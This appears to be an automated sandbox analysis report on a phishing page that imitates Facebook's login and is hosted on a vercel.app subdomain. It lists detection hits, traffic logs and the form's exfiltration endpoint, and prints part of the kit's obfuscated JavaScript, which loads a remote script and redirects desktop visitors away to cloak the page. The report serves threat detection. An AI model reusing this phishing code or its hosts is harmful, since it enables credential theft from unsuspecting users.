Click to jump to signature section
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html | Avira URL Cloud: detection malicious, Label: phishing |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/touch.css | Avira URL Cloud: Label: phishing |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/img_2713.jpg | Avira URL Cloud: Label: phishing |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/style.css | Avira URL Cloud: Label: phishing |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/facebooklogo.png | Avira URL Cloud: Label: phishing |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/favicon.ico | Avira URL Cloud: Label: phishing |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | Joe Sandbox AI: Score: 9 Reasons: The brand 'Facebook' is well-known and is associated with the domain 'facebook.com'., The URL 'mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app' does not match the legitimate domain 'facebook.com'., The URL contains multiple hyphens and a subdomain structure that is not typical for Facebook., The domain 'vercel.app' is a hosting platform and not directly associated with Facebook., The presence of input fields for 'Email or phone number' and password is typical for phishing attempts targeting Facebook credentials. DOM: 2.0.pages.csv |
Source: Yara match | File source: 1.4..script.csv, type: HTML |
Source: Yara match | File source: 2.0.pages.csv, type: HTML |
Source: Yara match | File source: dropped/chromecache_50, type: DROPPED |
Source: 0.0.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to a suspicious domain. The use of obfuscated code and the attempt to detect and redirect mobile devices further increases the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution. |
Source: 0.2.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/... This script demonstrates several high-risk behaviors, including redirecting users to an external domain (https://www.justice.gov/archive/ndic/spanish/13420/index.htm) based on device detection. The use of obfuscated code and the redirection to an untrusted domain are strong indicators of malicious intent. While the script may have a legitimate purpose, such as mobile optimization, the lack of transparency and the suspicious redirection raise significant security concerns. |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: Form action: https://emma-24.com/post.php vercel emma-24 |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: Number of links: 0 |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: Invalid link: Forgot Password? |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: HTML title missing |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: Form action: https://emma-24.com/post.php |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: <input type="password" .../> found |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: No favicon |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: No <meta name="author".. found |
Source: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968 | HTTP Parser: No <meta name="copyright".. found |
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49716 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49762 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49845 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49957 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50010 version: TLS 1.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253 |
Source: global traffic | HTTP traffic detected: GET /facebook.com.html HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /style.css HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /pingjs/?k=condiossi729&t=LA%20CENTRAL%20%F0%9F%91%BB&x=https://www.facebook.com/ HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /index.php?username=panilover HTTP/1.1Host: emma-24.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/touch.css HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/facebooklogo.png HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/img_2713.jpg HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /index.php?username=panilover HTTP/1.1Host: emma-24.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1Host: whos.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1Host: whos.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: chromecache_50.3.dr | String found in binary or memory: document.write(unescape("%0A%3Chtml%3E%0A%0A%3Chead%3E%0A%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%3C/meta%3E%0A%20%20%3Cmeta%20content%3D%22width%3Ddevice-width%22%20name%3D%22viewport%22%3E%3C/meta%3E%0A%20%20%3Ctitle%3Ereplit%3C/title%3E%0A%20%20%3Clink%20href%3D%22style.css%22%20rel%3D%22stylesheet%22%20type%3D%22text/css%22%3E%3C/link%3E%0A%3C/head%3E%0A%0A%3Cbody%3E%0A%20%20%3Cscript%20async%3D%22%22%20src%3D%22https%3A//emma-24.com/index.php%3Fusername%3Dpanilover%22%20type%3D%22text/javascript%22%3E%3C/script%3E%0A%3C/body%3E%0A%0A%3C/html%3E%0A%0A%3Cimg%20alt%3D%22%22%20src%3D%22//whos.amung.us/pingjs/%3Fk%3Dcondiossi729%26amp%3Bt%3DLA%20CENTRAL%20%uD83D%uDC7B%26amp%3Bx%3Dhttps%3A//www.facebook.com/%22%20style%3D%22display%3A%20none%3B%22%20/%3E%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A%09document.oncontextmenu%20%3D%20function%28%29%7Breturn%20false%7D%0A%3C/script%3E%0A%0A%0A%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A//%3C%21%5BCDATA%5B%0A%20function%20h%28r%2C%20a%29%20%7B%20var%20t%20%3D%20%22%22%3B%20if%20%28%22mix%22%20%3D%3D%20a%29%20var%20h%20%3D%20%0A%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%22%3B%20else%20var%20h%20%3D%20%0A%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%22%3B%20for%20%28var%20n%20%3D%200%3B%20r%20%3E%20n%3B%20n++%29%20t%20+%3D%20h.charAt%28Math.floor%28Math.random%28%29%20*%20%0Ah.length%29%29%3B%20return%20t%20%7D%3B%0A%0A%20%20%20%20%20%20%20%20var%20device%20%3D%20navigator.userAgent%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20if%20%28device.match%28/Iphone/i%29%7C%7C%20device.match%28/Ipod/i%29%7C%7C%20device.match%28/Android/i%29%7C%7C%20device.match%28/J2ME/i%29%7C%7C%20device.match%28/BlackBerry/i%29%7C%7C%20device.match%28/iPhone%7CiPad%7CiPod/i%29%7C%7C%20device.match%28/Opera%20Mini/i%29%7C%7C%20device.match%28/IEMobile/i%29%7C%7C%20device.match%28/Mobile/i%29%7C%7C%20device.match%28/Windows%20Phone/i%29%7C%7C%20device.match%28/windows%20mobile/i%29%7C%7C%20device.match%28/windows%20ce/i%29%7C%7C%20device.match%28/webOS/i%29%7C%7C%20device.match%28/palm/i%29%7C%7C%20device.match%28/bada/i%29%7C%7C%20device.match%28/series60/i%29%7C%7C%20device.match%28/nokia/i%29%7C%7C%20device.match%28/symbian/i%29%7C%7C%20device.match%28/HTC/i%29%29%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%7Delse%0A%7B%0Awindow.location%20%3D%20%22https%3A//www.justice.gov/archive/ndic/spanish/13420 |